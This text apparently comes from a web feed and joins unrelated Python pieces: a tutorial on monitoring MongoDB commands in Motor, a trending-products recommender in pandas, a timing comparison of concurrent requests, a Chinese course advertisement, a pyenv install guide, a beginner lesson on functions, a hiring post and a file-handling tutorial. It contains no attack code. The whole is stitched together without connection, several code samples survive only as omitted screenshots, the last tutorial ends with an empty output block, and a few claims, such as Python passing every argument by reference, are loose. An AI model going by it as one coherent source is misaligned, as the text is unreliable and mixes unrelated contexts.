Do you want to know every MongoDB query or command your program sends, and the server’s reply to each? How about getting a notification whenever the driver detects a primary failover, or when a new secondary joins the replica set? Over the last year, MongoDB drivers have implemented these monitoring features in all our supported programming languages. Here’s how to use monitoring in Motor, my python async driver.

Motor wraps PyMongo, and it shares PyMongo’s API for monitoring. To receive notifications about events, you subclass one of PyMongo’s four listener classes, CommandListener , ServerListener , TopologyListener , or ServerHeartbeatListener . Let’s subclass CommandListener, so we’re notified whenever a command starts, succeeds, or fails.

import logging

from pymongo import monitoring


class MyCommandLogger(monitoring.CommandListener):
    def started(self, event):
        logging.info("Command {0.command_name} with request id "
                     "{0.request_id} started on server "
                     "{0.connection_id}".format(event))

    def succeeded(self, event):
        logging.info("Command {0.command_name} with request id "
                     "{0.request_id} on server {0.connection_id} "
                     "succeeded in {0.duration_micros} "
                     "microseconds".format(event))

    def failed(self, event):
        logging.info("Command {0.command_name} with request id "
                     "{0.request_id} on server {0.connection_id} "
                     "failed in {0.duration_micros} "
                     "microseconds".format(event))

Register an instance of MyCommandLogger :

monitoring.register(MyCommandLogger())

You can register any number of listeners, of any of the four listener types.

We only need to use PyMongo’s API here, but if you create a MotorClient its commands are monitored, the same as a PyMongo MongoClient .

import sys

from tornado import ioloop, options, gen
from motor import MotorClient

logging.basicConfig(stream=sys.stdout, level=logging.INFO)

client = MotorClient()


async def do_insert():
    await client.test.collection.insert({'_id': 1, 'message': 'hi!'})

ioloop.IOLoop.current().run_sync(do_insert)

Watch out: PyMongo publishes notifications from a background thread, so your listeners' callbacks are executed on that thread, not the main thread. If you want to interact with Tornado or Motor from a listener, you must defer to the main thread using IOLoop.add_callback, which is the only thread-safe IOLoop method. Similarly, if you're using asyncio instead of Tornado, get to the main loop with call_soon_threadsafe. I can't think of a need for you to do this, though; it seems like logging is the only reasonable thing to do from a listener, and the Python logging module is thread-safe.
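If you did need to, a safe pattern (my own sketch, not from the Motor docs) is to capture the main thread's IOLoop up front and hand work back to it from the listener thread with add_callback:

from pymongo import monitoring
from tornado import ioloop

main_loop = ioloop.IOLoop.current()  # captured on the main thread

def handle_failure(command_name):
    # Runs on the main thread; safe to touch Motor or Tornado objects here.
    print('command failed:', command_name)

class FailureNotifier(monitoring.CommandListener):
    def started(self, event):
        pass

    def succeeded(self, event):
        pass

    def failed(self, event):
        # Called on PyMongo's monitoring thread, so defer to the main loop.
        main_loop.add_callback(handle_failure, event.command_name)

monitoring.register(FailureNotifier())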

For more info, see:

A complete example with Motor
PyMongo's monitoring API
The Command Monitoring Spec for all MongoDB Drivers
The Topology Monitoring Spec for all MongoDB Drivers

That was simple, so we have time for a picture of a monitor lizard and a log:


[Image: a monitor lizard and a log]


A Simple Trending Products Recommendation Engine in Python


Our product recommendations were boring. I knew that because our customers told us. When surveyed, the #1 thing they wanted from us was better product discovery. And looking at the analytics data, I could see customers clicking through page after page of recommendations, looking for something new to buy. We weren't doing a good job surfacing the back half of our catalog. There was no serendipity.

One common way of increasing exposure to the long tail of products is by simply jittering the results at random. But injecting randomness has two issues: first, you need an awful lot of it to get products deep in the catalog to bubble up, and second, it breaks the framing of the recommendations and makes them less credible in the eyes of your customers.

What do I mean by 'framing'? Let's look at a famous example from Yahoo!

The Britney Spears Effect.

Let's say you're reading about this weekend's upcoming NFL game. Underneath that article are a bunch of additional articles, recommended for you by an algorithm. In the early 2000s, it turned out just about everyone wanted to read about Britney Spears, whether they would admit it or not.

So you get to the bottom of your Super Bowl game preview and it says "You might also like:" and then shows you an article about Britney and K-fed. You feel kind of insulted by the algorithm. Yahoo! thinks I want to read about Britney Spears??

But instead, what if said "Other people who read this article read:". Now...huh...ok - I'll click. The framing gives me permission to click. This stuff matters!

Just like a good catcher can frame an on-the-margin baseball pitch for an umpire, showing product recommendations on a website in the right context puts customers in the right mood to buy or click.

"Recommended for you" -- ugh. So the website thinks it knows me, eh? How about this instead:

"Households like yours frequently buy"

Now I have context. Now I understand. This isn't a retailer shoving products in front of my face, it's a helpful assemblage of products that customers just like me found useful. Chock-full of social proof!

Finding Some Plausible Serendipity

After an awesome brainstorming session with one of our investors, Paul Martino from Bullpen Capital , we came up with the idea of a trending products algorithm. We'll take all of the add-to-cart actions every day, and find products that are trending upwards. Sometimes, of course, this will just reflect the activities of our marketing department (promoting a product in an email, for instance, would cause it to trend), but with proper standardization it should also highlight newness, trending search terms, and other serendipitous reasons a product might be of interest. It's also easier for slower-moving products to make sudden gains in popularity so should get some of those long-tail products to the surface.

Implementing a Trending Products Engine

First, let's get our add-to-cart data. From our database, this is relatively simple; we track the creation time of every cart-product (we call it a 'shipment item') so we can just extract this using SQL. I've taken the last 20 days of cart data so we can see some trends (though really only a few days of data is needed to determine what's trending):

SELECT v.product_id
     , -(CURRENT_DATE - si.created_at::date) "age"
     , COUNT(si.id)
FROM product_variant v
INNER JOIN schedule_shipmentitem si ON si.variant_id = v.id
WHERE si.created_at >= (now() - INTERVAL '20 DAYS')
  AND si.created_at < CURRENT_DATE
GROUP BY 1, 2

I've simplified the above a bit (the production version has some subtleties around active products, paid customers, the circumstances in which the product was added, etc), but the shape of the resulting data is dead simple:

id   age  count
14   -20  22
14   -19  158
14   -18  94
14   -17  52
14   -16  56
14   -15  56
14   -14  52
14   -13  100
14   -12  109
14   -11  151
14   -10  124
14   -9   123
14   -8   58
14   -7   64
14   -6   114
14   -5   93
14   -4   112
14   -3   87
14   -2   81
14   -1   19
15   -20  16
...
15   -1   30
16   -20  403
...
16   -1   842

Each row represents the number of cart adds for a particular product on a particular day in the past 20 days. I use 'age' as -20 (20 days ago) to -1 (yesterday) so that, when visualizing the data, it reads left-to-right, past-to-present, intuitively.

Here's sample data for 100 random products from our database. I've anonymized both the product IDs and the cart-adds in such a way that, when standardized, the results are completely real, but the individual data points don't represent our actual business.

Basic Approach

Before we dive into the code, let's outline the basic approach by visualizing the data. All the code for each intermediate step, and the visualizations, is included and explained later.

Here's the add-to-carts for product 542, from the sample dataset:


[Chart: daily cart adds for product 542]

The first thing we'll do is add a low-pass filter (a smoothing function) so daily fluctuations are attentuated.


[Chart: cart adds with the smoothing function applied]

Then we'll standardize the Y-axis, so popular products are comparable with less popular products. Note the change in the Y-axis values.


[Chart: the smoothed series after standardization]

Last, we'll calculate the slopes of each line segment of the smoothed trend.


[Chart: slopes of the smoothed, standardized series]

Our algorithm will perform these steps (in memory, of course, not visually) for each product in the dataset and then simply return the products with the greatest slope values in the past day, e.g. the max values of the red line at t=-1.

The Code

Let's get into it! You can run all of the code in this post via a python 2 Jupyter notebook.

Here's the code to produce the first chart (simply visualizing the trend). Just like we built up the charts, we'll build from this code to create the final algorithm.

import matplotlib.pyplot as plt
import pandas as pd
import numpy as np

# Read the data into a Pandas dataframe
df = pd.read_csv('sample-cart-add-data.csv')

# Group by ID & Age
cart_adds = pd.pivot_table(df, values='count', index=['id', 'age'])

ID = 542
trend = np.array(cart_adds[ID])

x = np.arange(-len(trend), 0)
plt.plot(x, trend, label="Cart Adds")
plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)
plt.title(str(ID))
plt.show()

It doesn't get much simpler. I use the pandas pivot_table function to create an index of both product IDs and the 'age' dimension, which just makes it easy to select the data I want later.

Smoothing

Let's write the smoothing function and add it to the chart:

def smooth(series, window_size, window):
    # Generate data points 'outside' of x on either side to ensure
    # the smoothing window can operate everywhere
    ext = np.r_[2 * series[0] - series[window_size-1::-1],
                series,
                2 * series[-1] - series[-1:-window_size:-1]]
    weights = window(window_size)
    weights[0:window_size/2] = np.zeros(window_size/2)
    smoothed = np.convolve(weights / weights.sum(), ext, mode='same')
    return smoothed[window_size:-window_size+1]  # trim away the excess data

smoothed = smooth(trend, 7, np.hamming)
plt.plot(x, smoothed, label="Smoothed")

This function merits an explanation. First, it's taken more-or-less from the SciPy Cookbook , but modified to be...less weird.

The smooth function takes a 'window' of weights, defined in this case by the Hamming Window , and 'moves' it across the original data, weighting adjacent data points according to the window weights.

Numpy provides a bunch of windows (Hamming, Hanning, Blackman, etc.) and you can get a feel for them at the command line:

>>> print np.hamming(7) [ 0.08 0.31 0.77 1. 0.77 0.31 0.08]

That 'window' will be moved over the data set ('convolved') to create a new, smoothed set of data. This is just a very simple low-pass filter.

Lines 5-7 invert and mirror the first few and last few data points in the original series so that the window can still 'fit', even at the edge data points. This might seem a little odd, since at the end of the day we are only going to care about the final data point to determine our trending products. You might think we'd prefer to use a smoothing function that only examines historical data. But because the interpolation just mirrors the trailing data as it approaches the forward edge, there's ultimately no net effect on the result.

Standardization

We need to compare products that average, for instance, 10 cart-adds per day to products that average hundreds or thousands. To solve this problem, we standardize the data by dividing by the Interquartile Range (IQR):

def standardize(series):
    iqr = np.percentile(series, 75) - np.percentile(series, 25)
    return (series - np.median(series)) / iqr

smoothed_std = standardize(smoothed)
plt.plot(x, smoothed_std)

I also subtract the median so that the series more-or-less centers around 0, rather than 1. Note that this is standardization not normalization , the difference being that normalization strictly bounds the value in the series between a known range (typically 0 and 1), whereas standardization just puts everything onto the same scale.

There are plenty of ways of standardizing data; this one is plenty robust and easy to implement.

Slopes

Really simple! To find the slope of the smoothed, standardized series at every point, just take a copy of the series, offset it by 1, and subtract. Visually, for some example data:


[Chart: a series and its offset copy, illustrating the slope calculation]

And in code:

slopes = smoothed_std[1:] - smoothed_std[:-1]
plt.plot(x[1:], slopes)

Boom! That was easy.

Putting it all together

Now we just need to repeat all of that, for every product, and find the products with the max slope value at the most recent time step.

The final implementation is below:

import pandas as pd
import numpy as np
import operator

SMOOTHING_WINDOW_FUNCTION = np.hamming
SMOOTHING_WINDOW_SIZE = 7

def train():
    df = pd.read_csv('sample-cart-add-data.csv')
    df.sort_values(by=['id', 'age'], inplace=True)
    trends = pd.pivot_table(df, values='count', index=['id', 'age'])

    trend_snap = {}

    for i in np.unique(df['id']):
        trend = np.array(trends[i])
        smoothed = smooth(trend, SMOOTHING_WINDOW_SIZE, SMOOTHING_WINDOW_FUNCTION)
        nsmoothed = standardize(smoothed)
        slopes = nsmoothed[1:] - nsmoothed[:-1]
        # I blend in the previous slope as well, to stabilize things a bit and
        # give a boost to things that have been trending for more than 1 day
        if len(slopes) > 1:
            trend_snap[i] = slopes[-1] + slopes[-2] * 0.5

    return sorted(trend_snap.items(), key=operator.itemgetter(1), reverse=True)

def smooth(series, window_size, window):
    ext = np.r_[2 * series[0] - series[window_size-1::-1],
                series,
                2 * series[-1] - series[-1:-window_size:-1]]
    weights = window(window_size)
    smoothed = np.convolve(weights / weights.sum(), ext, mode='same')
    return smoothed[window_size:-window_size+1]

def standardize(series):
    iqr = np.percentile(series, 75) - np.percentile(series, 25)
    return (series - np.median(series)) / iqr

trending = train()
print "Top 5 trending products:"
for i, s in trending[:5]:
    print "Product %s (score: %2.2f)" % (i, s)

And the result:

Top 5 trending products:
Product 103 (score: 1.31)
Product 573 (score: 1.25)
Product 442 (score: 1.01)
Product 753 (score: 0.78)
Product 738 (score: 0.66)

That's the core of the algorithm. It's now in production, performing well against our existing algorithms. We have a few additional pieces we're putting in place to goose the performance further:

Throwing away any results from wildly unpopular products. Otherwise, products that fluctuate around 1-5 cart-adds per day too easily appear in the results just by jumping to 10+ adds for one day.

Weighting products so that a product that jumps from an average of 500 adds/day to 600 adds/day has a chance to trend alongside a product that jumped from 20 to 40.

There is weirdly little material out there about trending algorithms - and it's entirely possible (likely, even) that others have more sophisticated techniques that yield better results.

But for Grove, this hits all the marks: explicable, serendipitous, and it gets more clicks than any other product feed we've put in front of our customers.

Like what you read? Join the newsletter and get updated when there's something new.

Concurrent Requests with Python3

Intro

Pulling data from websites is often the first step of a data-analytic process.

The number of data resources required for an analysis influences how long this process takes. A few resources, of course, take little time to gather. But gathering data from 1000 resources (i.e. making 1000 API calls) could take a substantial amount of time. If the resources must be gathered on a repeating basis, the problem is compounded.

People new to python might be uncertain as to how to make this process faster; here’s a demonstration and comparison of some approaches!

We start with a list of resources:

subs = [
    'politics', 'canada', 'funny', 'news', 'gifs', 'python',
    'worldnews', 'aww', 'movies', 'books', 'space', 'creepy',
]
endpoints = ['https://reddit.com/r/%s/top.json?t=day&limit=10' % s for s in subs]

Blocking

With the requests library, we can put the data from each resource into a list shown below.

Note, the resources are downloaded sequentially. The total time is approximately:

time_per_resource * number_of_resources .

import requests

%%timeit
done_blocking = [requests.get(u) for u in endpoints]

1 loop, best of 3: 8.46 s per loop

Parallel

Parallel methods split the acquisition of resources across workers. Workers can be threads or processes and are accessed through the Executor class from the concurrent.futures module. Users can overlook some of these details: requests_futures provides an API the same as requests, with a parallel underlying implementation.

Each worker handles tasks sequentially. If the number of workers (threads or processes) is close to the number of tasks, the process requires a roughly fixed time for any number of tasks; specifically, it requires approximately the time of the longest task:

from requests_futures.sessions import FuturesSession
from concurrent.futures import wait

session = FuturesSession(max_workers=len(endpoints))

%%timeit
futures = [session.get(u) for u in endpoints]
done, incomplete = wait(futures)

1 loop, best of 3: 189 ms per loop

More generally, the process requires the time to work through (number of tasks / number of workers) tasks in sequence:

session = FuturesSession(max_workers=2)

%%timeit
futures = [session.get(u) for u in endpoints]
done, incomplete = wait(futures)

1 loop, best of 3: 1.1 s per loop

Asyncio

A third method is asynchronous. In this case, nothing is guaranteed to happen in sequence. Tasks must have entry/exit points where the worker (i.e. the main thread) can leave them and work on something else. In this case, the web request constitutes that entry point; so, for example, once the first web request is started, the main thread works on something else, i.e. starting the next web request.

I have a hard time coming up with an expression for the duration of the asynchronous case. I suppose it's something like:

time_not_waiting + max(time_for_task_i - time_task_i_started)

import asyncio
import aiohttp
import json

loop = asyncio.get_event_loop()
client = aiohttp.ClientSession(loop=loop)

async def get_json(client, url):
    async with client.get(url) as response:
        return await response.read()

%%timeit
result = loop.run_until_complete(
    asyncio.gather(
        *[get_json(client, e) for e in endpoints]
    )
)

1 loop, best of 3: 741 ms per loop

When to use which?

There’s a few ways to look at this. The key for me is that, in terms of simplicity, sequential > parallel > asynchronous. That’s my apriori preference.

For a few tasks, use sequential.

With a large number of tasks that cannot meaningfully be entered/exited (i.e. they are not waiting on input/output), use parallel. A good example here is running an operation on the rows of a data set which is already in memory.

With a large number of tasks which are usually waiting for input/output, use asynchronous. For web requests, asynchronous fits the bill given the large number of tasks.

"Large" depends on how long a task takes and your time sensitivity.

Bonus

Asynchronous parallel would be fascinating and useful for a very large number of i/o heavy tasks; if you have any idea how to achieve this do share!

Python's Powerful Development Capabilities: Seize the Opportunity and Lead the Programming Trend

Qiku Academy (奇酷学院), 1 hour ago

Many people may not know much about Python. It is in fact a programming language, widely used by programmers, which is why programmers tend to be familiar with it. But people who are new to it naturally want to know: what is Python, and what can it do? Qiku Academy has put together the following primer.

What is Python?

Python is a programming language that the famous "uncle Guido", Guido van Rossum, wrote over the Christmas holidays of 1989 as a way to pass an otherwise boring Christmas.

Today there are roughly 600 programming languages in the world, but only around 20 are in common use. If you have heard of the TIOBE index, you have a rough idea of how popular each language is. Here is a chart of how the 10 most-used languages have changed over the past 10 years:

[Chart omitted]

What Python can do:

Broadly speaking, each of these languages has its strengths. C is a language close to the hardware that can be used to write operating systems, so it suits programs that chase raw speed and squeeze the most out of the hardware. Python, on the other hand, is a high-level language for writing applications.

When you start doing real software development in a language, besides the code you write yourself you need a lot of ready-made building blocks to speed up development. For example, to write an email client, if you started at the lowest level by writing the network-protocol code yourself, you might not finish in a year. High-level languages usually come with a fairly complete base library that you can call directly: an SMTP library for the email protocols, a GUI library for the desktop, and so on. Building on such existing libraries, an email client can be written in a few days.

Python provides exactly such a complete standard library, covering networking, files, GUIs, databases, text and much more, which is why it is vividly described as having "batteries included". With Python, many features do not have to be written from scratch; you can simply use what is already there.

Beyond the built-in library, Python has a huge number of third-party libraries: things other people have developed for you to use directly. Of course, if your own code is wrapped up well, it can also be offered to others as a third-party library.

Many large websites are built with Python, for example YouTube and Instagram, and Douban in China. Many big companies, including Google and Yahoo, and even NASA, use Python heavily.

Python's designers position it as "elegant", "explicit" and "simple", so Python programs always look simple and easy to understand. For beginners, Python is not only easy to get started with; if you go deeper, you can eventually write extremely complex programs with it.

In short, Python's philosophy is simple elegance: write code that is easy to understand, and write as little code as possible. If a veteran programmer shows off tens of thousands of lines of obscure, hard-to-read code, feel free to laugh at him.

[Image omitted]

What kinds of applications is Python suited to? First of all network applications, including websites and backend services; next, the many small everyday tools, including the scripted tasks system administrators need; and finally, wrapping programs written in other languages so they are easier to use.

Qiku Academy's Python course is designed for people with zero experience or only a little programming background. Under an instructor's guidance and following the course, you can get started within a month, and in about four months you can systematically master Python and write programs to solve problems on your own. If you feel this language is right for you, start learning now!

pyenv: Managing Multiple Python Versions Side by Side


You often run into situations like these:

The system ships with Python 2.6, but you need features from Python 2.7;
The system ships with Python 2.x, but you need Python 3.x;

In these cases you need to install several Pythons on one machine without disturbing the system Python, i.e. you need multiple Python versions to coexist. pyenv is exactly such a Python version manager.

1. Installing pyenv

$ git clone git://github.com/yyuu/pyenv.git ~/.pyenv
$ echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bashrc
$ echo 'export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.bashrc
$ echo 'eval "$(pyenv init -)"' >> ~/.bashrc
$ exec $SHELL -l

2. Installing a Python

List the versions available for installation:

$ pyenv install --list

This command lists the Python versions pyenv can install; a few examples:

2.7.8 # the latest Python 2 release

3.4.1 # the latest Python 3 release

anaconda-2.0.1 # supports Python 2.6 and 2.7

anaconda3-2.0.1 # supports Python 3.3 and 3.4

Entries that are just a version number, like x.x.x, are official CPython releases; entries of the form xxxxx-x.x.x, with both a name and a version, are derived or third-party distributions.

2.1 Installing Python's build dependencies

Before building a Python you need to install the packages it depends on; the known prerequisites are listed below.

On CentOS/RHEL/Fedora:

sudo yum install readline readline-devel readline-static
sudo yum install openssl openssl-devel openssl-static
sudo yum install sqlite-devel
sudo yum install bzip2-devel bzip2-libs

2.2 Installing a specific version

The following command installs Python 3.4.1:

$ pyenv install 3.4.1 -v

The command downloads the Python source from GitHub, unpacks it into /tmp and compiles it there. If a dependency is missing, the build fails and you need to install it and rerun the command.

For research environments, the Anaconda distribution built for scientific computing is recommended: pyenv install anaconda-2.1.0 installs the 2.x series, pyenv install anaconda3-2.1.0 the 3.x series.

Anaconda is large and downloading it through pyenv is slow. You can download it yourself from the Anaconda website and place the file in the ~/.pyenv/cache directory, and pyenv will not download it again.

2.3 Updating the shim database

After installation, refresh pyenv's database:

$ pyenv rehash

List the Python versions currently installed:

$ pyenv versions
* system (set by /home/seisman/.pyenv/version)
  3.4.1

The asterisk marks the version currently in use, here the system Python.

2.4 Setting the global Python version

$ pyenv global 3.4.1
$ pyenv versions
  system
* 3.4.1 (set by /home/seisman/.pyenv/version)

The global Python version is now 3.4.1. You can also use pyenv local or pyenv shell to switch the Python version temporarily.

2.5 Confirming the Python version

$ python
Python 3.4.1 (default, Sep 10 2014, 17:10:18)
[GCC 4.4.7 20120313 (Red Hat 4.4.7-1)] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>>

3. Using Python

Typing python now runs the new version;

System scripts call the old Python directly as /usr/bin/python, so they are not affected;

Third-party modules installed with pip go under ~/.pyenv/versions/3.4.1 and do not conflict with system modules.

After installing modules with pip you may need to run pyenv rehash to update the database;

References

https://github.com/yyuu/pyenv

http://blog.csdn.net/chris__kk/article/details/45127973

0015 Introduction to Programming with Python: Defining Functions

Zero-Basics Programming (零基础学编程), 2 hours ago

[Image omitted]

Today we cover Python functions.

Read input parameters and compute the area of a triangle, circle or rectangle

First read one parameter, the shape type: 1 = triangle, 2 = circle, 3 = rectangle.

Then, depending on the shape type, ask for the other parameters needed to compute the area:

for example, base and height for a triangle, radius for a circle, and length and width for a rectangle.

Then compute the shape's area.

The code is as follows:


[Screenshot of the code omitted]
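The original code was shown only as a screenshot. A Python 2 sketch in the same spirit (the variable names are mine, not from the lesson) might look like this:

# 1 = triangle, 2 = circle, 3 = rectangle
shape = int(raw_input("Shape type (1/2/3): "))
if shape == 1:
    base = float(raw_input("Base: "))
    height = float(raw_input("Height: "))
    area = base * height / 2
elif shape == 2:
    radius = float(raw_input("Radius: "))
    area = 3.14159 * radius * radius
else:
    length = float(raw_input("Length: "))
    width = float(raw_input("Width: "))
    area = length * width
print "Area:", area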

The result is as follows:

[Screenshot of the output omitted]

Think about it: can the code that computes the area of one particular shape be reused, that is, called from other programs?

If the three area computations are written inline in one program like this, there is no way for other programs to reuse them.

The concept of a function

A function is an organized, reusable block of code used to implement a single piece of functionality or a set of related functionality.

Functions improve a program's modularity and code reuse. You already know that Python provides many built-in functions, such as print. You can also create your own, which are called user-defined functions.

Syntax:

def functionname( parameters ):
    "function docstring"
    function_suite
    return [expression]

For example:

def printme(str):
    print str
    return

def add(num1, num2):
    ret = num1 + num2
    return ret

To summarize the key features:

A function block begins with the def keyword, followed by the function name and parentheses.

Any input parameters or arguments must be placed inside the parentheses, which is where parameters are defined.

The first statement of a function body may optionally be a documentation string describing the function.

The function body starts after a colon and is indented.

return [expression] exits the function, optionally passing a value back to the caller. A return with no expression is equivalent to returning None, and the return statement can also be omitted entirely.

Calling a function

Once a function is defined, it can be called. We have already called plenty of functions, such as print and input.

For example, calling our own add function:

def add(num1, num2):
    ret = num1 + num2
    return ret

print add(5, 3)
print add(8, 6)

Passing arguments by value versus by reference

All parameters (arguments) in Python are passed by reference. If you modify a parameter inside a function, the change is also visible in the code that called the function.

For example:

def changelist(thelist):
    thelist.append(["a", "b", "c"])
    print "Values inside the function: ", thelist
    return

mylist = [1, 2, 3]
changelist(mylist)
print "Values outside the function: ", mylist

The object passed into the function and the object that has the new items appended are the same reference, so the output is:

Values inside the function:  [1, 2, 3, ["a", "b", "c"]]
Values outside the function:  [1, 2, 3, ["a", "b", "c"]]

Try it in your Python environment:

[Screenshot omitted]

Kinds of parameters

Required parameters

Required parameters must be passed in the correct order, and the number passed in a call must match the number declared.

When calling the printme function you must pass exactly one argument, otherwise an error is raised:

Try it in your Python environment:

[Screenshot omitted]

Keyword arguments

Keyword arguments are tied to the function call: the call uses the parameter names to decide which value goes to which parameter.

Keyword arguments let you pass arguments in a different order than declared, because the Python interpreter matches values to parameters by name.

Try it in your Python environment:

[Screenshot omitted]

Default parameters

When calling a function, if no value is passed for a parameter that has a default, the default value is used. The example below prints the default age when age is not passed:

Try it in your Python environment:

[Screenshot omitted]
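The screenshot is not reproduced here, but the classic default-parameter example looks like this (a sketch, in Python 2 like the rest of the lesson; the function is illustrative, not the one from the screenshot):

def printinfo(name, age=35):
    print "Name:", name
    print "Age:", age
    return

printinfo(name="miki")          # age falls back to the default, 35
printinfo(name="miki", age=50)  # the default is overridden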
Reworking the earlier four-operation calculator

Take the four-operation calculator program we wrote earlier and turn the addition, subtraction, multiplication and division into four functions that are then called:

The code is as follows:

[Screenshot of the code omitted]
Reworking the area program above

The area program from the start of this lesson can likewise be split into three functions, one per shape's area formula, which are then called as needed:

The complete code is as follows:

[Screenshot of the code omitted]
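Since the complete code exists only as a screenshot, here is a Python 2 sketch of the same refactor: one function per shape, then a dispatch on the shape type (the names are mine):

def triangle_area(base, height):
    return base * height / 2.0

def circle_area(radius):
    return 3.14159 * radius * radius

def rectangle_area(length, width):
    return length * width

shape = int(raw_input("Shape type (1=triangle, 2=circle, 3=rectangle): "))
if shape == 1:
    print triangle_area(float(raw_input("Base: ")), float(raw_input("Height: ")))
elif shape == 2:
    print circle_area(float(raw_input("Radius: ")))
else:
    print rectangle_area(float(raw_input("Length: ")), float(raw_input("Width: ")))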

The most important benefit of functions is that they let you reorganize and reuse code, reduce duplication, lower the chance of errors, and improve the structure and readability of the code.

Functions are an essential concept: more complex programs and functionality are built on top of them.

Homework

1. Modify the program that takes a year-month-day date and prints the day of the week: turn the leap-year check, the day counting and the weekday calculation into functions.

2. Extend the area functions with a parallelogram and a trapezoid.

Previous lessons

Because the lessons in this series build heavily on one another, please read them in the order they were published in the message history of the WeChat account 零基础学编程 (Zero-Basics Programming).

QQ group

Everyone is welcome to join QQ group 603559164 (zero-basics programming) to discuss, learn and improve together.

Athelas (YC S16) is hiring mobile/back end engineers for blood diagnostics


Athelas works on problems at the unique confluence of computer science, biology, and machine learning. Our team's background includes research at Stanford, work in the robotics industry, published papers in Nature + Science. We're backed by some of the top VCs in the valley, and looking to add to our founding team.



Join us and work on a device that's already run thousands of blood tests and is quietly transforming the dynamics of blood count diagnostics.

Jobs

Software Engineer

Work on our backend, mobile, and data-processing stack. Create interfaces and features for users + doctors in our mobile applications and web portals. Experience in javascript, python, C. (React, Python web frameworks)

email resume and projects to: founders [at] getathelas.com

Hardware Engineer

Work on our device EE stack. Build out low-cost, resilient hardware that is deployed on field in monthly cycles. Experience with microcontrollers, software, servo-control, firmware, circuit design, electrical engineering.

email resume and projects to: founders [at] getathelas.com

Business Development (Medical)

Work on our marketing, strategy, and business development in the medical community as we roll out the Athelas device. Looking for a hire with 5+ years of experience in medical sales/bizdev.

email resume and projects to: founders [at] getathelas.com

Python Full-Stack Series: File Operations


Python can inspect and create files and add, modify and delete file content. The function used for this is open in Python 3.5.x; Python 2.7.x supports both file and open, but the file function was removed in the 3.5.x series.

Opening a file in Python

file_handle = open('file_path', 'mode')

Note: the file handle is just a variable name; the file path can be absolute or relative.

Python file open modes

Basic modes

Mode  Meaning      Notes
r     read-only    the file must exist
w     write-only   creates the file if it does not exist, truncates it if it does
x     write-only   not readable; creates the file if it does not exist, raises an error if it does
a     append       creates the file if it does not exist, otherwise appends to the end

Modes with +

Mode  Meaning
r+    read and write
w+    write and read
x+    write and read
a+    write and read

Modes with b

Mode  Meaning
rb    binary read
wb    binary write
xb    binary write-only
ab    binary append

Note: when a file is opened in a b mode, reads return bytes and writes must also be given bytes.

Modes with both + and b

Mode  Meaning
rb+   binary read/write
wb+   binary read/write
xb+   binary write-only
ab+   binary read/write

Ways to read a file in Python

Method            Meaning
read([size])      read the whole file, or size bytes if size is given
readline([size])  read one line at a time
readlines()       read every line, each line becoming one element of a list

The test file is hello.txt, with the following content:

Hello Word!
123
abc
456
abc
789
abc

read

Code:

# Open the file hello.txt read-only
f = open("hello.txt", "r")
# Read the file content into the variable c
c = f.read()
# Close the file
f.close()
# Print c
print(c)

Output:

C:\Python35\python.exe F:/Python_code/sublime/Day06/file.py
Hello Word!
123
abc
456
abc
789
abc

readline

Code:

# Open hello.txt read-only
f = open("hello.txt", "r")
# Read the first line
c1 = f.readline()
# Read the second line
c2 = f.readline()
# Read the third line
c3 = f.readline()
# Close the file
f.close()
# Print the first line
print(c1)
# Print the second line
print(c2)
# Print the third line
print(c3)

Output:

C:\Python35\python.exe F:/Python_code/sublime/Day06/file.py
Hello Word!
123
abc

readlines

# Open hello.txt read-only
f = open("hello.txt", "r")
# Read all lines into c
c = f.readlines()
# Check the data type
print(type(c))
# Close the file
f.close()
# Loop over the lines and print them
for n in c:
    print(n)

Result:

C:\Python35\python.exe F:/Python_code/sublime/Day06/file.py
# The data type of the output
<class 'list'>
Hello Word!
123
abc
456
abc
789
abc

Ways to write to a file in Python

Method                           Meaning
write(str)                       write a string to the file
writelines(sequence_of_strings)  write several lines; the argument can be any iterable, e.g. a list or tuple

write

Code:

# Open write.txt write-only; it is created if missing and truncated if present
file = open("write.txt", "w")
# Write the string "test write" into the file
file.write("test write")
# Close the file
file.close()

The content of write.txt is:

test write

writelines

Code:

# Open a new file wr_lines.txt for writing
f = open("wr_lines.txt", "w", encoding="utf-8")
# Write a list
f.writelines(["11", "22", "33"])
# Close the file
f.close()

The content of wr_lines.txt:

112233

Methods provided by Python file objects

close(self):

Close an open file

f.close()

fileno(self):

Returns the file descriptor

f = open("hello.txt", "r")
ret = f.fileno()
f.close()
print(ret)

Result:

flush(self):

Flush the write buffer to disk

f.flush()

isatty(self):

Returns True if the file is attached to a tty device, otherwise False

f = open("hello.txt", "r")
ret = f.isatty()
f.close()
print(ret)

Result:

C:\Python35\python.exe F:/Python_code/sublime/Day06/file.py
False

readable(self):

Returns True if the file is readable, otherwise False

f = open("hello.txt", "r")
ret = f.readable()
f.close()
print(ret)

Result:

C:\Python35\python.exe F:/Python_code/sublime/Day06/file.py
True

readline(self, limit=-1):

Reads a single line per call

f = open("hello.txt", "r")
print(f.readline())
print(f.readline())
f.close()

Result:

C:\Python35\python.exe F:/Python_code/sublime/Day06/file.py
Hello Word!
123

readlines(self, hint=-1):

Reads every line, each becoming an element of a list

f = open("hello.txt", "r")
print(f.readlines())
f.close()

Result:

C:\Python35\python.exe F:/Python_code/sublime/Day06/file.py
['Hello Word!\n', '123\n', 'abc\n', '456\n', 'abc\n', '789\n', 'abc']

tell(self):

Gets the current position of the file pointer.

f = open("hello.txt", "r")
print(f.tell())
f.close()

Result:

C:\Python35\python.exe F:/Python_code/sublime/Day06/file.py
0

seek(self, offset, whence=io.SEEK_SET):

Moves the file pointer to the specified position. (The whence argument is sketched briefly after the example below.)

f = open("hello.txt", "r")
print(f.tell())
f.seek(3)
print(f.tell())
f.close()

Execution result:

C:\Python35\python.exe F:/Python_code/sublime/Day06/file.py
0
3
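The whence argument is never demonstrated in the post; as a small sketch, using the same hello.txt but opened in binary mode (text-mode files in Python 3 only accept offsets produced by tell()):

import io

with open("hello.txt", "rb") as f:
    f.seek(0, io.SEEK_END)     # jump to the end of the file
    size = f.tell()            # the file size in bytes
    f.seek(-3, io.SEEK_END)    # three bytes back from the end
    print(size, f.read())      # prints the size and the last three bytes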

seekable(self):

Whether the file pointer can be moved (i.e. whether the stream supports seeking).

f = open("hello.txt", "r")
print(f.seekable())
f.close()

Execution result:

C:\Python35\python.exe F:/Python_code/sublime/Day06/file.py
True

writable(self):

Whether the file is writable.

f = open("hello.txt", "r")
print(f.writable())
f.close()

Execution result:

C:\Python35\python.exe F:/Python_code/sublime/Day06/file.py
